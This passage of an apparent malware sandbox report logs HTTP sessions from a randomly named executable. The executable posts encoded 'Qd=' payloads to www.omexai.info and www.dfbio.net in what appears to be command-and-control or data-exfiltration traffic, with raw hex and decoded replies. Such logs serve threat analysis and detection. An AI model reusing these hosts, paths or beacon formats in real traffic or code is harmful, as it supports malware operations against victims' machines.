                        Data Raw: 51 64 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 75 51 43 41 6e 39 36 6b 56 4e 65 4d 72 73 42 33 70 4c 62 6b 2f 43 4f 54 48 62 6a 6b 53 31 4f 4c 31 45 4e 47 45 41 45 49 4d 4d 6e 74 62 76 4f 62 45 2f 7a 52 4e 6a 69 2f 4d 67 44 4c 32 53 4a 68 76 7a 57 77 65 77 70 49 4c 70 77 63 51 4f 68 58 65 51 69 44 53 35 59 38 37 76 67 76 33 65 30 77 44 61 7a 75 35 76 77 79 41 70 6c 68 72 6e 6c 6e 30 49 53 51 4d 57 4b 4e 70 68 6f 49 72 32 6f 72 57 7a 64 54 37 42 34 4c 76 6f 6a 66 69 75 4b 68 64 65 77 59 66 6c 4f 79 7a 4e 68 42 45 6c 6f 6a 39 75 31 6f 35 58 65 75 59 30 4b 44 63 3d
                        Data Ascii: Qd=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43uQCAn96kVNeMrsB3pLbk/COTHbjkS1OL1ENGEAEIMMntbvObE/zRNji/MgDL2SJhvzWwewpILpwcQOhXeQiDS5Y87vgv3e0wDazu5vwyAplhrnln0ISQMWKNphoIr2orWzdT7B4LvojfiuKhdewYflOyzNhBEloj9u1o5XeuY0KDc=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.4650053.33.130.190804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:52.414859056 CEST10811OUTPOST /45sz/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.omexai.info
                        Origin: http://www.omexai.info
                        Referer: http://www.omexai.info/45sz/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 6d 51 43 53 76 39 6f 33 4e 4e 5a 4d 72 73 41 33 70 62 62 6b 2b 59 4f 54 75 51 6a 6b 57 50 4f 4a 4e 45 4d 6b 4d 41 4e 5a 4d 4d 30 4e 62 76 57 62 45 2b 39 78 4e 4d 69 2f 63 6b 44 4b 47 53 4a 68 76 7a 57 79 32 77 67 36 6a 70 32 63 51 50 6b 6e 65 63 6d 44 54 75 59 38 7a 52 67 76 36 68 31 44 62 61 7a 4f 70 76 39 6b 73 70 34 52 72 70 72 48 31 56 53 51 41 5a 4b 4e 64 44 6f 4d 72 63 6f 72 79 7a 63 54 2b 4e 69 61 48 33 67 64 79 56 63 67 31 67 2b 35 6d 6d 47 42 76 6a 67 78 77 4b 31 58 6c 62 79 2f 45 37 4a 4e 41 75 64 31 54 61 6b 7a 2f 63 58 7a 6c 34 6a 78 6c 47 56 63 44 56 50 50 56 67 6e 7a 38 46 73 32 56 6f 57 4b 6e 48 51 38 45 41 38 65 73 42 36 6d 55 79 70 50 51 41 36 79 30 35 70 4d 66 69 66 63 50 7a 58 4f 46 45 70 53 4c 45 49 64 42 2f 6a 41 76 67 46 30 62 6e 4c 50 7a 57 4d 64 73 2f 4f 69 4b 58 58 6d 70 35 65 46 58 65 36 44 6e 51 58 66 54 47 6b 34 42 34 7a 57 50 59 57 57 57 [TRUNCATED]
                        Data Ascii: Qd=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43mQCSv9o3NNZMrsA3pbbk+YOTuQjkWPOJNEMkMANZMM0NbvWbE+9xNMi/ckDKGSJhvzWy2wg6jp2cQPknecmDTuY8zRgv6h1DbazOpv9ksp4RrprH1VSQAZKNdDoMrcoryzcT+NiaH3gdyVcg1g+5mmGBvjgxwK1Xlby/E7JNAud1Takz/cXzl4jxlGVcDVPPVgnz8Fs2VoWKnHQ8EA8esB6mUypPQA6y05pMfifcPzXOFEpSLEIdB/jAvgF0bnLPzWMds/OiKXXmp5eFXe6DnQXfTGk4B4zWPYWWWjoQ9wc7KeITxg/lUsJlDuFsjbcsgZPeTSBjuAmMc2BOvRiTTpTiSrRURt9SZF4o7ehahPPmQfwX7XyKKhJ0CXQR2WAq9iAsSZsQm9zg4xt90sTwp7JLmcoIHAg0+RIKT5+/3y6wZqgq7yBI9U5+5yTqcPrAKIRQWa0NmPYvz4ytlGjP+mu9AvQC46y4ZnFBaR9VUz4MvOwijG/rcdf3pECGY9zvb8PSD54xcdZKFhIedtpk/34Q1LzLkxPsk6TVh0/J3duHrJ1WJikUTpNIt7f3lQCOwCYI3p8SGCh2F9sc3nTw3mit2yGVWPUZW+7WBN3VXYBIbKCFuW+LxeKxrA+Yb+Qp7rcqWkrEqU6+U1cF6t5avlkYT/JuwsS+djLLW6OkPvB/EgEl7VUJHhRUXo2gTXz8KhWU9/hG/WDdykXQ/w3wq160TZSJ8/wg4fP4ROtgNhJdCBhcRrUUBz+xO/2CojDp3gzpvUNj4ejvWmtYYVubRrqI9CovoxAwK53s76gj4fjyLNW7sZcB1xrl3WqunD2bEl/a4AiGqUyUh0azZS4ttpq3e/DTgiGUXEebFlTbTrzFO0vNYstObm2gZ5jQKT/NMvERg6m/eh8VJcQlrd3hM6g+Nt0rVbBwWLPtZnrWeF2qsiHnOA8eC9vn2Ka7Fjgg/xTHtYu [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.4650063.33.130.190804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:54.952425957 CEST441OUTGET /45sz/?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.omexai.info
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:55.388154984 CEST389INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Tue, 03 Sep 2024 08:45:55 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 7a 3d 6d 44 63 64 63 52 38 26 51 64 3d 77 6b 51 32 6a 6d 53 38 79 4d 78 67 52 6c 4b 62 44 52 57 79 4e 46 30 65 38 53 37 49 61 70 67 56 33 39 68 4d 52 30 64 6f 31 44 36 73 44 54 44 6f 6d 30 35 35 52 4d 47 47 56 6c 5a 46 51 55 76 64 44 56 4f 2b 70 67 65 4b 66 35 4a 61 4c 6e 31 41 4b 34 30 78 39 75 44 44 42 65 6f 6d 7a 47 39 53 31 38 45 67 45 59 2f 32 66 53 4c 54 47 6c 65 69 73 4a 4c 47 78 50 59 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY="}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.465007218.247.68.184804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:01.274671078 CEST703OUTPOST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 44 69 6f 47 48 54 6e 55 57 53 33 44 65 58 6a 30 77 61 70 6d 66 76 66 75 53 61 72 39 63 6c 4b 55 6a 70 64 62 39 66 4b 30 59 70 74 65 56 37 31 56 37 78 41 58 46 76 2b 6f 7a 37 6c 67 56 6e 35 6f 33 55 71 38 65 62 64 6c 6c 59 43 6e 64 72 69 47 58 36 44 36 6b 72 2b 7a 45 6d 78 6d 34 65 51 69 4e 61 4e 62 67 57 61 32 66 6e 37 57 49 61 75 57 78 78 77 35 62 6c 70 6e 42 35 79 58 4b 72 37 35 4a 59 63 73 47 72 5a 62 51 30 79 56 54 4a 7a 69 4a 61 30 6e 52 5a 51 59 39 42 6b 37 78 41 63 32 77 58 62 4e 48 36 36 64 55 39 78 4c 36 59 44 30 2f 4f 46 42 63 77 3d 3d
                        Data Ascii: Qd=D/9dVfJYvq9GDioGHTnUWS3DeXj0wapmfvfuSar9clKUjpdb9fK0YpteV71V7xAXFv+oz7lgVn5o3Uq8ebdllYCndriGX6D6kr+zEmxm4eQiNaNbgWa2fn7WIauWxxw5blpnB5yXKr75JYcsGrZbQ0yVTJziJa0nRZQY9Bk7xAc2wXbNH66dU9xL6YD0/OFBcw==
                        Sep 3, 2024 10:46:02.214585066 CEST1236INHTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000
                        Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                        Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                        Sep 3, 2024 10:46:02.214606047 CEST1217INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                        Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.465008218.247.68.184804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:03.816143990 CEST723OUTPOST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 75 55 6a 4d 68 62 2b 61 6d 30 64 70 74 65 65 62 31 55 31 52 41 63 46 76 36 57 7a 2b 64 67 56 6e 46 6f 33 56 61 38 64 71 64 71 6d 6f 43 6c 45 62 69 41 54 36 44 36 6b 72 2b 7a 45 6d 6b 44 34 65 59 69 4f 71 64 62 69 30 79 31 53 48 37 52 4a 61 75 57 38 52 77 39 62 6c 70 52 42 38 71 75 4b 74 33 35 4a 64 67 73 43 70 78 59 46 6b 79 54 4d 35 79 33 45 36 70 43 56 4d 31 69 33 79 34 6e 35 7a 30 4d 31 52 4b 58 57 4c 62 4b 47 39 56 34 6e 66 4b 41 79 4e 34 49 48 32 51 65 4f 2f 57 48 75 62 45 54 59 6d 47 31 6d 76 77 72 48 53 34 3d
                        Data Ascii: Qd=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXuUjMhb+am0dpteeb1U1RAcFv6Wz+dgVnFo3Va8dqdqmoClEbiAT6D6kr+zEmkD4eYiOqdbi0y1SH7RJauW8Rw9blpRB8quKt35JdgsCpxYFkyTM5y3E6pCVM1i3y4n5z0M1RKXWLbKG9V4nfKAyN4IH2QeO/WHubETYmG1mvwrHS4=
                        Sep 3, 2024 10:46:04.760212898 CEST1236INHTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:04 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000
                        Data Raw: 38 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                        Data Ascii: 86cX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                        Sep 3, 2024 10:46:04.760230064 CEST224INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                        Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AM
                        Sep 3, 2024 10:46:04.760240078 CEST993INData Raw: 4e 47 0b 44 d8 e6 27 06 5c ce 60 58 92 f0 bc 22 f3 63 07 7c c3 ef c8 1f de c4 c3 06 fe d6 8c 29 62 68 83 b1 a0 cd f9 69 04 ef 15 4d d5 85 43 51 47 f7 a3 00 21 39 3d 9d 3f 37 3e 7e 89 04 c7 9e 23 0e 3d 20 21 24 7b f2 fe cd 8d e6 cb 1b fe d2 2f 8d
                        Data Ascii: NGD'\`X"c|)bhiMCQG!9=?7>~#= !${/?wW7/o_n/>n.{j7~N2|{psTw`4 Bf!gyDkA>/{yw/`S


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.465009218.247.68.184804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:06.358516932 CEST10805OUTPOST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 44 2f 39 64 56 66 4a 59 76 71 39 47 43 44 34 47 55 43 6e 55 58 79 33 45 56 33 6a 30 37 36 70 69 66 76 6a 75 53 62 2f 74 63 58 6d 55 69 35 74 62 2b 35 2b 30 61 70 74 65 64 62 31 52 31 52 41 64 46 70 53 53 7a 2f 67 56 56 69 4a 6f 32 33 43 38 56 2b 70 71 39 59 43 6c 5a 72 69 46 58 36 43 69 6b 72 75 4a 45 6d 30 44 34 65 59 69 4f 76 5a 62 6c 6d 61 31 51 48 37 57 49 61 75 6b 78 78 77 56 62 6c 68 76 42 38 6d 2b 4c 64 58 35 49 39 51 73 41 38 74 59 59 55 79 52 50 35 7a 30 45 36 6c 52 56 49 56 66 33 78 6b 64 35 77 6f 4d 30 55 2f 68 4f 49 48 39 54 64 55 72 39 50 53 4b 71 75 30 6f 48 6c 56 71 47 4e 61 36 73 4b 77 41 55 33 7a 6b 37 39 45 33 47 55 49 63 77 4d 2f 54 7a 57 53 57 59 39 4c 38 6f 34 54 4a 51 31 35 41 75 57 6e 62 41 41 33 45 6f 78 36 66 75 6f 34 4f 77 37 79 52 6f 64 76 72 2b 35 69 51 5a 44 65 6d 75 52 41 52 78 6c 39 30 79 2b 72 73 4a 70 57 41 65 4d 75 48 44 47 4b 52 68 50 45 44 48 77 37 42 30 58 74 4f 37 38 39 7a 7a 6c 49 7a 2b 41 38 64 4a 4f 41 41 4f 30 7a 38 44 62 31 52 6a 52 4f 2f 43 61 73 [TRUNCATED]
                        Data Ascii: Qd=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXmUi5tb+5+0aptedb1R1RAdFpSSz/gVViJo23C8V+pq9YClZriFX6CikruJEm0D4eYiOvZblma1QH7WIaukxxwVblhvB8m+LdX5I9QsA8tYYUyRP5z0E6lRVIVf3xkd5woM0U/hOIH9TdUr9PSKqu0oHlVqGNa6sKwAU3zk79E3GUIcwM/TzWSWY9L8o4TJQ15AuWnbAA3Eox6fuo4Ow7yRodvr+5iQZDemuRARxl90y+rsJpWAeMuHDGKRhPEDHw7B0XtO789zzlIz+A8dJOAAO0z8Db1RjRO/CasNSrboFMF5Wh8FmgKkMgSxM6HclByZMZ76cYFJ2WN44cSE/qRpE8qyg+EeSxz55b3mFcHNYDVX1V/VvyXN14mrBHo6Iu+4ZZESzy+MJOvus9vDdNP8j3/okaTKNFK7w+qVdlUqFDqJu4JKma0v/nwqUHoUnNZX2zVNXucRzNOdVE+Pex1r6qS7y4MsWQjsETCZTFiC6JumrltwvsEKYEKDXDDQyjEYNqL/SLBWLJFNkRHYOloezrIhL4A57R9AQZIAuAhlnl/QUsx1N1S3zj/reyC2XHZQbW7qI2hCqih+6LSb8cNGna3OZpodSrg5afqLOVV2WuKZ8JrgLGt+K4mZ1t2WS4f3WlaxjiKrps92FstL8ZvT+XYGW3+3SrVaogOouAzcELpVGOx5P5ZUYmKuczJixWeFxyI22ZoQcHmReIz7BcRubzOEwz0BBFcFujS6UemMT/BjOgkzaK1R/GbHFvv3FcjxKMzJ9Ffn5AMACGAkx/RREkBknGvhT4U9r5HiC1FFSK38apFFco4nkgv/skzjdqv4aZpc+KkEpPtrzPHw+Y1Q+cVyHfYXmlWyUs8o3aLOX4oq6MNYk2H19TaDEApC1Sj2MfOPnIO5M/BT3T6uHTOS5v31r9O213Ihp4Ebt7CaOcID+IGzghOEvsxkDLRGDzrT1sxqb [TRUNCATED]
                        Sep 3, 2024 10:46:07.584222078 CEST1236INHTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000
                        Data Raw: 34 63 61 0d 0a 1f 8b 08 00 00 00 00 00 04 0a b5 58 7b 6f db d6 15 ff 7b fe 14 b7 0a 1c 6c 80 28 52 92 e3 87 24 6b 48 fd 40 02 24 5d 10 bb eb 06 04 08 28 f1 ca 24 42 91 2a 79 6d d9 31 0a 38 69 ea 47 12 37 06 da 3c 1c bb 48 b2 26 a9 97 21 56 ba b6 76 6c 37 cd 87 a9 48 c9 7f ed 2b ec 9c 7b 49 89 b6 6c 0f 2d 30 07 91 45 f2 9c df 39 e7 77 5e 97 ce 7d 30 fc 97 a1 f1 bf 5f 1a 21 3a 2b 9b e4 d2 c7 1f 5e 38 3f 44 62 92 2c 7f 92 1e 92 e5 e1 f1 61 f2 b7 73 e3 17 2f 90 64 42 21 63 cc 31 8a 4c 96 47 3e 8a 91 98 ce 58 25 23 cb d5 6a 35 51 4d 27 6c 67 42 1e bf 2c 4f 23 4a 12 d5 82 af 92 cb 75 12 1a d3 62 79 d2 95 e3 56 a6 cb a6 e5 0e 1e 81 90 1c 18 18 10 8a 42 98 aa 1a 2a 31 83 99 34 7f fe fc 18 49 2a e0 46 b3 f6 b2 b1 37 bf ff f5 6a b3 56 23 12 e9 51 7a e0 a6 44 3e b2 19 19 b5 27 2d 2d 27 0b 05 d0 74 d9 8c 49 09 9b a9 d0 c1 18 a3 d3 4c 2e ba 2e 87 fe 40 92 48 57 c1 d6 66 66 cb aa 33 61 58 19 25 5b b2 2d 26 b9 c6 75 9a 49 f4 d1 b2 b8 2c a9 65 c3 9c c9 fc 95 3a 9a 6a a9 f1 b3 8e a1 9a f1 73 d4 9c a2 cc 28 aa 71 57 [TRUNCATED]
                        Data Ascii: 4caX{o{l(R$kH@$]($B*ym18iG7<H&!Vvl7H+{Il-0E9w^}0_!:+^8?Db,as/dB!c1LG>X%#j5QM'lgB,O#JubyVB*14I*F7jV#QzD>'--'tIL..@HWff3aX%[-&uI,e:js(qW\Q~FFpE)EUD2DRcBgmj(VNqZNl'= ]M:j%SpzMkT4zT*Dfx(@J|d%fW2LR6[Q5&2~j<LwH.S:0T7#3eKtZ-7R:l`$Ml(O!5%]h"`@u-f`TM)J((W)bJ-XEROxhLE$K5cAmq!~DVCU!1=3cB;,^Hu+C0Z,cx#]0Z60*w}`Qp/RBjSDGO]m{Shp|Z"@'"'<BdML[e-9|@PzMW1w8$.X"*f+0,!t1bV;sHg+gF`Q'SC
                        Sep 3, 2024 10:46:07.584239006 CEST282INData Raw: c9 a1 d1 e1 e1 f0 39 0e aa c8 c3 9e b3 bd 43 fd 23 a2 a2 82 9e b3 6c a7 ac 9a 68 ab dd 52 38 98 db ae 64 79 1b aa a6 31 01 15 81 04 1e 41 43 3b 35 22 3e 68 3d a6 16 cc d6 4c 16 83 84 7f 06 35 91 54 94 ee c0 cb 56 5f 33 2d ce f4 59 60 16 97 8a 09
                        Data Ascii: 9C#lhR8dy1AC;5">h=L5TV_3-Y`MBjICJ\p=m`=,0NvuDyZA\)(B=)p $0'`HVZ\:, !pQd|`\$&UY&ua;<AMNGD'\`X"c
                        Sep 3, 2024 10:46:07.584252119 CEST942INData Raw: 33 61 32 0d 0a 3f 37 3e 7e 89 04 c7 9e 23 0e 3d 20 21 24 7b f2 fe cd 8d e6 cb 1b fe d2 2f 8d c7 b7 9a 3f dd f2 77 57 bc ed 7f 37 ff f1 2f 6f f1 e9 fe ea f3 5f e7 6e c0 a5 bf f6 a3 b7 b2 ec 2f 3e f0 1f df f4 1f 6e d5 df 2e 7b f7 6a 8d af 37 7e 9d
                        Data Ascii: 3a2?7>~#= !${/?wW7/o_n/>n.{j7~N2|{psTw`4 Bf!gyDkA>/{yw/`SJ+0SYj^[<7`UO+V}w4


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.465010218.247.68.184804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
